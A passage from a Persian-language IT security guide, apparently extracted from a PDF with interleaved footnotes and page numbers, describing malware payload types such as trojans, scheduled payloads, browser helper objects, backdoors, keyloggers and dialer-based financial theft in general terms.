ﺍﻳﻦ ﺷﻤﺎﺭﻩﻫﺎ ﻣﺸﻜﻼﺕ ﺟﺪﻱ ﺑﺮﺍﻳﺘﺎﻥ ﭘﻴﺶ ﺧﻮﺍﻫﺪ ﺁﻣﺪ.
ﺑﺮﺧﻲ ﺍﺯ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻭﺍﻗﻌﹰﺎ ﺁﺳﻴﺐﺭﺳﺎﻥ ﻫﺴﺘﻨﺪ؛ ﺑﻪ ﺍﻳﻦ
ﺗﺮﺗﻴﺐ ﻛﻪ ﺑﺎ ﻭﺍﺭﺩ ﻛﺮﺩﻥ ﺩﺍﺩﻩ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺴﺮﻋﺖ ﻣﻲﺗﻮﺍﻧﻨـﺪ
ﻓﺎﻳﻠﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺭ ﺩﻳﺴﻚ ﺳﺨﺖ ﺭﺍ ﭘﺎﻙ ﻛﻨﻨـﺪ ﻳـﺎ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﺎ
ﺍﻃﻼﻋﺎﺕ ﻧﺎﺩﺭﺳﺖ ﺑﺎﺯﻧﻮﻳﺴﻲ ﻧﻤﺎﻳﻨﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ
ﺑﺎ ﺭﻭﺷﻬﺎﻳﻲ ﻛـﻪ ﺍﺣﺘﻤـﺎﻝ ﺷﻨﺎﺳـﺎﻳﻲ ﻛﻤﺘـﺮﻱ ﺩﺍﺭﻧـﺪ ﺗﻐﻴﻴـﺮﺍﺕ
ﮔﻔﺘﻪﺷﺪﻩ ﺭﺍ ﺑﻮﺟﻮﺩ ﻣﻲﺁﻭﺭﻧﺪ:
ﻧﺼﺐ ﻳﻚ ﺗﺮﻭﺍ
ﺍﻳﻦ ﻋﻤﻠﻜﺮﺩ ﺩﺭ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﺑﺴﻴﺎﺭ ﺭﺍﻳـﺞ ﺷـﺪﻩ ﺍﺳـﺖ.
ﻻ ﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻧﺼﺐ ﺷـﺪﻩ ﻭ ﻟـﺬﺍ ﺑﺮﻧﺎﻣـﺔ
ﺭﻭﻱ ﺭﺍﻳﺎﻧﻪ ﺷﻤﺎ ﻣﻌﻤﻮ ﹰ
ﻣﺨﺮﺏ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺷـﻤﺎ ﻳـﺎ ﺳﻴـﺴﺘﻢﻋﺎﻣـﻞ ﺍﺯ ﺁﻥ
ﺍﺳﺘﻔﺎﺩﺓ ﺯﻳﺎﺩﻱ ﻣﻲﻛﻨﻴﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷـﻮﺩ )ﻣﻌﻨـﺎﻱ ﺍﺻـﻠﻲ ﺗـﺮﺍﻭﺍ( .ﺍﺯ
ﺍﻳﻦ ﮔﺬﺷﺘﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ ﺩﻳﮕـﺮﻱ ﺭﺍ ﻭﺍﺭﺩ ﺳﻴـﺴﺘﻢ
ﻛﻨﺪ ﻛﻪ ﺩﺭ ﻳﻚ ﺯﻣﺎﻥ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴﻴﻦ ﺷـﺪﻩ ﻳـﺎ ﻫﻨﮕـﺎﻡ ﺭﻭﺷـﻦ
ﺷﺪﻥ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﻨﺪ .ﺩﺭ ﺑﺨـﺶ "ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺳـﺮﺑﺎﺭ"
ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳﻦ ﺭﻭﺷﻬﺎ ﺗﻮﺿﻴﺢ ﺩﺍﺩﻩ ﺷﺪﻩﺍﻧﺪ.
ﺯﻣﺎﻧﺒﻨﺪﻱ ﺑﺮﺍﻱ ﺁﻳﻨﺪﻩ
ﻫﺮﻳﻚ ﺍﺯ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﮔﻔﺘﻪ ﺷﺪﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻼﻓﺎﺻﻠﻪ ﺍﺗﻔﺎﻕ
ﺑﻴﻔﺘﻨﺪ ﻭ ﻳﺎ ﺑﺮﺍﻱ ﻭﻗﻮﻉ ﺩﺭ ﺁﻳﻨﺪﻩ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﺷﻮﻧﺪ .ﺑﺮﺍﻱ ﻣﺜـﺎﻝ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺨﺮﺏ ﻋﻼﻗﻪﻣﻨﺪ ﺑﺎﺷـﻨﺪ
ﻛﻪ ﺍﻋﻼﻡ ﺷﻮﺩ ﻳﻚ ﻛﺮﻡ ﺧﺎﺹ ﺩﺭ ﺭﻭﺯﻫﺎﻱ ﺍﻭﻟﻴﺔ ﮊﺍﻧﻮﻳـﺔ ﺳـﺎﻝ
۲۰۰۰ﻳﻚ ﺧﺮﺍﺑﻲ ﺑﺰﺭﮒ ﺑﻪ ﺑﺎﺭ ﺁﻭﺭﺩ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﺳﺮﺑﺎﺭ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺭﺩﻳﺎﺑﻲ ﻭ ﺍﻋﻤﺎﻝ ﺗﻐﻴﻴﺮ ﺩﺭ ﺷﺒﻜﻪ
٤٨
ﺍﻳﻦ ﺩﺳﺘﻪ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎ ﭘﺎﻳﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺷﻤﺎ ﻣﺸﺎﻫﺪﻩ ﻣﻲﻛﻨﻴـﺪ ﺭﺍ
ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻋﻼﻭﻩ ﺑﺮ ﺁﻧﭽﻪ ﻛـﻪ ﺷـﻤﺎ ﺩﺭ ﺣﺎﻟـﺖ
ﻣﻌﻤﻮﻝ ﻣﺸﺎﻫﺪﻩ ﻣـﻲ ﻛﻨﻴـﺪ ﺻـﻔﺤﺎﺕ ﺩﻳﮕـﺮﻱ ﺭﺍ ﺑـﻪ ﻧﻤـﺎﻳﺶ
ﺩﺭﺁﻭﺭﻧﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﺳﺖ ﺭﺍ ﺑـﺎ
ﺗﺒﻠﻴﻐﺎﺕ ﺧﻮﺩ ﺟﺎﻳﮕﺰﻳﻦ ﻧﻤﺎﻳﻨﺪ ،ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭ ﻣﻮﺭﺩ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ
ﻭ ﺗﻌــﺎﻣﻼﺗﻲ ﻛــﻪ ﺑــﺎ ﺗﻮﻟﻴﺪﻛﻨﻨــﺪﺓ ﺁﻥ ﺍﻧﺠــﺎﻡ ﺩﺍﺩﻩﺍﻳــﺪ ﺑــﺮﺍﻱ
ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺧﻮﺩ ﺑﻔﺮﺳﺘﻨﺪ .ﺍﻳﻦ ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎ ﺩﺭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﻣـﻮﺍﺭﺩ
ﺩﺍﺭﺍﻱ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﺑﺮ ﺭﻭﻱ ﻣﺮﻭﺭﮔﺮ ﺷـﻤﺎ ﻫـﺴﺘﻨﺪ :ﺁﻧﭽـﻪ ﻭﺍﺭﺩ
ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺁﻧﭽـﻪ ﻛـﻪ ﻣـﻲﺑﻴﻨﻴـﺪ ﺭﺍ
ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ؛ ﻭ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻣﺸﺎﻫﺪﺍﺕ ﺷﻤﺎ ﺭﺍ ﺗﺤـﺖ ﻧﻈـﺮ ﺩﺍﺭﻧـﺪ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺷﻤﺎ ﺭﺍ ﺑﻪ ﻳﻚ ﻣﻘﺼﺪ ﺍﺯ ﭘﻴﺶ ﺗﻌﻴـﻴﻦﺷـﺪﻩ
ﮔﺰﺍﺭﺵ ﺩﻫﻨﺪ .ﺩﺭ ،Internet Explorerﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﻃﺮﺍﺣﻲ
ﺷﺪﻩ ﻭ ٤٩BHOﻧﺎﻡ ﺩﺍﺭﺩ .ﺍﮔﺮﭼﻪ ﻛﺎﺭﺑﺮ ﻣﻲﺗﻮﺍﻧـﺪ BHOﻫـﺎﻱ
ﺳﺎﻟﻢ ﻭ ﺑﺴﻴﺎﺭ ﻣﻔﻴﺪﻱ ﺭﺍ ﭘﺪﻳﺪ ﺁﻭﺭﺩ ،ﺍﻣﺎ ﺍﻳﻦ ﻗﺎﺑﻠﻴﺖ ﺑﺮﺍﻱ ﺍﻳﺠـﺎﺩ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﺍﺧﻼﻗﻴﺎﺕ ﺩﺭ ﺁﻧﻬﺎ ﻛﻤﺘﺮ ﺭﻋﺎﻳـﺖ ﺷـﺪﻩ
ﻧﻴﺰ ﺍﻣﻜﺎﻧﺎﺕ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺑﻮﺟﻮﺩ ﺁﻭﺭﺩﻩ ﺍﺳﺖ.
ﺩﺭﺑﻬﺎﻱ ﻣﺨﻔﻲ
٥٠
ﻻ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﻧﻴـﺎﺯ ﺑـﻪ ﻭﺍﺭﺩ
ﻣﻌﻤﻮ ﹰ
ﻛﺮﺩﻥ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒـﻮﺭ ﺩﺍﺭﻳـﺪ؛ ﺍﮔﺮﭼـﻪ ﺍﻳـﻦ ﺳـﻄﺢ ﺍﺯ
ﺍﻣﻨﻴﺖ ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻤﻬﺎﻳﻲ ﻛـﻪ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ
ﺍﻳﻤﻦ ﻫـﺴﺘﻨﺪ ﻭ ﺗﻨﻬـﺎ ﺍﺷـﺨﺎﺹ ﺧﺎﺻـﻲ ﻣـﻲﺗﻮﺍﻧﻨـﺪ ﺍﺯ ﭘـﺸﺖ
ﺻﻔﺤﻪﻛﻠﻴﺪ ﺁﻧﻬﺎ ﻭﺍﺭﺩ ﺳﻴﺴﺘﻢ ﺷﻮﻧﺪ ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ .ﻧﺮﻡﺍﻓـﺰﺍﺭ "ﺩﺭﺏ
ﻣﺨﻔﻲ" ﺑﺎ ﺑﻲﺍﺛﺮ ﻛﺮﺩﻥ ﻛﻠﻴﺔ ﺣﻔﺎﻇﻬـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﻳﻨﭽﻨﻴﻨـﻲ ﺑـﻪ
ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ٥١ﺍﺟﺎﺯﺓ ﺩﺳﺘﺮﺳﻲ ﺑﻪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺭﺍ ﻣﻲﺩﻫـﺪ .ﺍﻳـﻦ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﻔﺎﻇﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻛﺎﺭ ﺑﮕﺬﺍﺭﺩ
ﺗﺎ ﺗﻨﻬﺎ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻥ ﺑﺘﻮﺍﻧﺪ ﺍﺯ ﺳﻴﺴﺘﻢ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳـﺪ .ﺍﮔﺮﭼـﻪ
ﺍﻳﻦ ﺟﺰﺋﻴﺎﺕ ﺍﺯ ﻳﻚ ﻣﻮﺭﺩ ﺗﺎ ﻣـﻮﺭﺩ ﺩﻳﮕـﺮ ﻣﺘﻔـﺎﻭﺕ ﺍﺳـﺖ ،ﺍﻣـﺎ
٤٧
ﻻ ﺑﻪ ﺷﻜﻞ ﺑﺮﻧﺎﻣﻪﺍﻱ ﻇﺎﻫﺮ ﻣﻲﺷـﻮﺩ ﻛـﻪ
ﻧﺮﻡﺍﻓﺰﺍﺭ ﻣﺨﺮﺏ ﻣﻌﻤﻮ ﹰ
ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﻲﻧﺸﻴﻨﺪ ﻭ ﺯﻣﺎﻧﻲﻛﻪ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺭﺍ ﺭﻭﺷـﻦ ﻳـﺎ
Payload Software
47
Web Tracking/Modification Software
Browser Helper Objecthttp://msdn.microsoft.com/library/enus/dnweb
gen/html/bho.asp
Backdoors
Remote User
48
49
50
51
ﺑﺨﺶ ﺩﻭﻡ
ﺑﺎﺯﻧﻮﻳﺴﻲ ﻳﺎ ﺣﺬﻑ ﺩﺍﺩﻩﻫﺎ
ﺑﺮﻧﺎﻣﺔ ﺧﺎﺻـﻲ ﺭﺍ ﺁﻏـﺎﺯ ﻣـﻲﻛﻨﻴـﺪ ﺑـﻪ ﺍﺟـﺮﺍ ﺩﺭ ﻣـﻲﺁﻳـﺪ .ﺗﻨﻬـﺎ
ﻣﺤﺪﻭﺩﻳﺘﻲ ﻛﻪ ﻋﻤﻠﻜﺮﺩ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫـﺎ ﻣـﻲﺗﻮﺍﻧـﺪ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ
ﺗﺼﻮﺭﺍﺕ ﻭ ﻣﻬﺎﺭﺕ ﭘﺪﻳﺪﺁﻭﺭﻧﺪﺓ ﺁﻧﻬﺎ ﺍﺳﺖ.
٧٤
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻛﺎﺭﺑﺮ ﺭﺍﻩ ﺩﻭﺭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺭﻭﻱ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻛﻨﺘﺮﻝ ﻛﺎﻣﻞ ﭘﻴﺪﺍ
ﻛﺮﺩﻩ ﺑﺎﺷﺪ .ﺣﺘﻲ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﻳﻦ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﺍﮔـﺮ ﺑﺨﻮﺍﻫﻨـﺪ،
ﺑﺘﻮﺍﻧﻨﺪ ﺷﻤﺎ ﺭﺍ ﺍﺯ ﺍﺩﺍﻣﺔ ﻛﺎﺭﺗﺎﻥ ﺑﺎﺯﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ
ﺗﺤﺖ ﻓﺮﻣﺎﻥ ﺷﺨﺺ ﺩﻳﮕﺮﻱ ﻗﺮﺍﺭ ﺩﺍﺭﺩ ﻭ ﺷـﻤﺎ ﺍﺯ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺁﮔﺎﻫﻲ ﻧﺪﺍﺭﻳﺪ .ﺍﻣﺎ ﺳﺆﺍﻟﻲ ﻛﻪ ﭘﻴﺶ ﻣﻲﺁﻳﺪ ﺍﻳﻦ ﺍﺳـﺖ ﻛـﻪ ﭼـﺮﺍ
ﻣﻬﺎﺟﻢ ﻣﺎﻳﻞ ﺍﺳﺖ ﻛﻨﺘﺮﻝ ﺳﻴـﺴﺘﻢ ﺷـﻤﺎ ﺭﺍ ﺩﺭ ﺩﺳـﺖ ﺑﮕﻴـﺮﺩ؟
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻻﻳﻞ ﻣﺘﻌـﺪﺩﻱ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ،ﺍﺯ ﺟﻤﻠـﻪ
ﺍﻳﻨﻜﻪ:
•
ﻫﻴﭻ ﺩﻟﻴﻠﻲ ﻏﻴﺮ ﺍﺯ ﺍﺛﺒﺎﺕ ﺗﻮﺍﻧﺎﻳﻲ ﺧﻮﺩ ﺑﻪ ﺩﻭﺳﺘﺎﻧﺶ ﺑﺮﺍﻱ
ﺍﻧﺠﺎﻡ ﺍﻳﻦ ﻛﺎﺭ ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
•
ﺑﻄﻮﺭ ﻛﻠﻲ ﺑﺨﻮﺍﻫﺪ ﺗﺨﺮﻳﺒﮕﺮ ﺑﺎﺷﺪ؛
•
ﺑﺮﺍﻱ ﻫﺪﻑ ﻗﺮﺍﺭ ﺩﺍﺩﻥ ﺷﻤﺎ ﺩﻟﻴﻞ ﺷﺨﺼﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ؛
•
ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺑﺮﺍﻱ ﻓﻌﺎﻟﻴﺘﻬـﺎﻱ ﻣﺨـﺮﺏ ﺩﻳﮕـﺮ ﺍﺳـﺘﻔﺎﺩﻩ
ﻛﻨﺪ؛ ﻣﺜﻞ ﻓﺮﺳﺘﺎﺩﻥ ﻫﺮﺯﻧﺎﻣﻪ ﻳـﺎ ﺍﻧﺠـﺎﻡ ﺣﻤﻠـﺔ ﺗﺨﺮﻳـﺐ
ﺳﺮﻭﻳﺲ ) ٥٢(DoSﻋﻠﻴﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ؛ ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ
•
ﺑﺨﻮﺍﻫﺪ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺷﻲ ﺭﺍ ﺑﻪ ﺳﺮﻗﺖ ﺑﺒﺮﺩ.
ﺗﻮﺟﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻴﺪ ﻧـﺮﻡ ﺍﻓﺰﺍﺭﻫـﺎﻳﻲ ﺑـﺎ ﻛـﺎﺭﺑﺮﺩ ﻣـﺸﺎﺑﻪ ﺗﺤـﺖ
ﻋﻨــﺎﻭﻳﻨﻲ ﭼــﻮﻥ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﺩﺳﺘﺮﺳــﻲ ﺭﺍﻩ ﺩﻭﺭ ٥٣ﻳــﺎ ﺍﺑﺰﺍﺭﻫــﺎﻱ
ﺭﺍﻫﺒﺮﻱ ﺭﺍﻩ ﺩﻭﺭ ٥٤ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺸﺮﻭﻉ ﻭ ﺑـﺴﻴﺎﺭ ﻭ ﭘﺮﺍﺳـﺘﻔﺎﺩﻩﺍﻱ
ﻫﺴﺘﻨﺪ .ﺍﮔﺮ ﺍﺯ ﺍﻳﻦ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺮﺍﻱ ﺍﻫـﺪﺍﻑ ﻛـﺎﺭﻱ ﺧـﻮﺩ ﺍﺳـﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻴﺪ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻣﻼﺣﻈﺎﺕ ﻣﻨﺎﺳﺐ ﺍﻣﻨﻴﺘﻲ ﻣﺎﻧﻨﺪ ﻧـﺎﻡ
ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺭﺍ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪﺍﻳﺪ.
ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ
٥٥
ﻣﻔﻬﻮﻡ "ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ" ﺍﺯ ﻧﺎﻡ ﺁﻥ ﻣﺸﺨﺺ ﺍﺳﺖ .ﺁﻧﻬﺎ ﺗﻤـﺎﻣﻲ
ﻛﻠﻴﺪﻫﺎﻱ ﻓﺸﺮﺩﻩ ﺷﺪﺓ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﺍ ﺛﺒـﺖ ﻭ ﺩﺭ ﻳـﻚ ﻓﺎﻳـﻞ
ﺫﺧﻴﺮﻩ ﻣﻲﻛﻨﻨﺪ .ﺍﻳﻦ ﻓﺎﻳﻞ ﻣﻲﺗﻮﺍﻧـﺪ ﺩﺭ ﺁﻳﻨـﺪﻩ ﺑـﺎ ﺩﺳﺘﺮﺳـﻲ ﺍﺯ
ﻃﺮﻳﻖ ﺩﺭﺏ ﻣﺨﻔﻲ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ ﺑﮕﻴـﺮﺩ ﻭ ﻳـﺎ ﺍﺯ ﻃﺮﻳـﻖ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻳﺎ ﻭﺏ ﺑﺮﺍﻱ ﻧﻮﻳﺴﻨﺪﺓ ﺑﺮﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ.
ﺷﺎﻳﺎﻥ ﺫﻛﺮ ﺍﺳﺖ ﻛﻪ ﺛﺒﺖﻛﻨﻨﺪﻩ ﻛﻠﻴﺪ ﺗﻤـﺎﻣﻲ ﺁﻧﭽـﻪ ﻛـﻪ ﻭﺍﻗﻌـﹰﺎ
ﺗﺎﻳﭗ ﻣﻲﻛﻨﻴﺪ ﺭﺍ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ ﻭ ﻧﻪ ﺁﻧﭽﻪ ﻛﻪ ﺍﺯ ﻃﺮﻳـﻖ ﺷـﺒﻜﻪ
ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ .ﺑﻨﺎﺑﺮﺍﻳﻦ ﺣﺘﻲ ﺍﮔـﺮ ﺷـﻤﺎﺭﺓ ﻛـﺎﺭﺕ ﺍﻋﺘﺒـﺎﺭﻱ ﺭﺍ
Denial of Service Attack
Remote Access Tools
Remote Administration Tools
Keyloggers
52
53
54
55
ﺭﻭﻱ ﺻﻔﺤﺔ ﻭﺏ ﺍﻳﻤﻦ ﻭﺍﺭﺩ ﻛﻨﻴﺪ )ﻳﻌﻨﻲ ﺍﮔﺮ ﻫﻨﮕﺎﻡ ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋـﺎﺕ
ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﺷـﻮﺩ( ،ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﺩﻗﻴﻘـﹰﺎ ﺁﻧﭽـﻪ ﻛـﻪ ﺗﺎﻳـﭗ
ﻣﻲﻛﻨﻴﺪ ﺭﺍ -ﺑﺼﻮﺭﺕ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻧﺸﺪﻩ -ﺛﺒﺖ ﻣﻲﻧﻤﺎﻳﺪ.
ﺳﺮﻗﺖ ﻣﺎﻟﻲ
ﺩﺭ ﺍﻛﺜﺮ ﺳﺮﻗﺘﻬﺎﻳﻲ ﻛﻪ ﺩﺭﻧﺘﻴﺠﺔ ﺣﻤﻼﺕ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺷﺨﺼﻲ
ﺍﺗﻔﺎﻕ ﺍﻓﺘﺎﺩﻩﺍﻧﺪ ،ﺍﺯ ﺭﺍﻳﺎﻧﺔ ﻗﺮﺑﺎﻧﻲ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺻﻮﺭﺕ ﮔﺮﻓﺘﻪ
ﺍﺳﺖ .ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﻣﻮﺍﺭﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺩﺭ ﺁﻧﻬﺎ ﺑـﺎ ﺍﺳـﺘﻔﺎﺩﻩ ﺍﺯ
ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺳﺮﺑﺎﺭ ،ﭘﻮﻝ ﻣﺴﺮﻭﻗﻪ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛـﺎﺭ ﺑـﻪ ﻣـﺼﺮﻑ
ﺭﺳﻴﺪﻩ ﺍﺳﺖ .ﺳﺎﺩﻩﺗﺮﻳﻦ ﻣﺜﺎﻝ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ،ﻳـﻚ ﻣـﻮﺩﻡ
ﺭﺍ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺷﻨﺎﺳﺎﻳﻲ ﻛﻨﺪ ﻭ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺑﺮﻗﺮﺍﺭﻱ ﺗﻤﺎﺱ
ﺑﺎ ﻣﻘﺎﺻﺪ ﺩﻭﺭﺩﺳﺖ ﺍﺳﺘﻔﺎﺩﻩ ﻧﻤﺎﻳﺪ .ﺍﺯ ﺁﻧﺠﺎ ﻛﻪ ﺑﺮﻧﺎﻣﻪ ﻧﻤﻲﺗﻮﺍﻧـﺪ
ﺻﺤﺒﺖ ﻛﻨﺪ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﺮﺍﻱ ﻣﻬﺎﺟﻢ ﻫﻴﭻ ﻣﺰﻳﺘﻲ ﻧﺪﺍﺭﺩ ،ﺑﺠـﺰ
ﻧﻮﻋﻲ ﺍﺣﺴﺎﺱ ﺭﺿﺎﻳﺖ ﺷﻴﻄﺎﻧﻲ ﻣﺒﻨﻲ ﺑﺮ ﺍﻳﻨﻜﻪ ﺷـﻤﺎ ﺩﺭ ﭘﺎﻳـﺎﻥ
ﻣﺎﻩ ﻳﻚ ﺻﻮﺭﺗﺤﺴﺎﺏ ﺳـﻨﮕﻴﻦ ﺍﺯ ﺷـﺮﻛﺖ ﻣﺨـﺎﺑﺮﺍﺕ ﺩﺭﻳﺎﻓـﺖ
ﻣﻲﻛﻨﻴﺪ.
ﺩﺭ ﻣﻮﺍﺭﺩ ﺩﻳﮕﺮ ﻣﻬﺎﺟﻢ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﺑﻬـﺮﺓ ﺷﺨـﺼﻲ
ﺑﺒﺮﺩ .ﺩﺭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻛﺸﻮﺭﻫﺎ ﻣﻤﻜﻦ ﺍﺳﺖ ﺷﻤﺎﺭﻩ ﺗﻠﻔـﻦ ﺧﺎﺻـﻲ
ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻛﻪ ﻭﻗﺘﻲ ﺑﺎ ﺁﻥ ﺗﻤﺎﺱ ﮔﺮﻓﺘﻪ ﻣﻲﺷﻮﺩ ﺷﺮﻛﺖ
ﻣﺨﺎﺑﺮﺍﺕ ﺩﺭ ﻫﺮ ﺩﻗﻴﻘﻪ ﻫﺰﻳﻨﺔ ﺑﻴﺸﺘﺮﻱ ﺑﺮﺍﻱ ﺗﻤﺎﺱ ﮔﻴﺮﻧﺪﻩ ﺛﺒﺖ
ﻛﻨﺪ ﻭ ﺩﺭ ﻋﻮﺽ ﻣﻘﺪﺍﺭﻱ ﺍﺯ ﺍﻳﻦ ﻫﺰﻳﻨﻪ ﺑﻪ ﺣﺴﺎﺏ ﻛـﺴﻲ ﺑـﺮﻭﺩ
ﻛﻪ ﺑﺎ ﺍﻭ ﺗﻤﺎﺱ ﺣﺎﺻﻞ ﺷﺪﻩ ﺍﺳﺖ .ﺍﻳﻦ ﺍﻣـﺮ ﺩﺭ ﺍﻧـﻮﺍﻉ ﻣﺨﺘﻠـﻒ
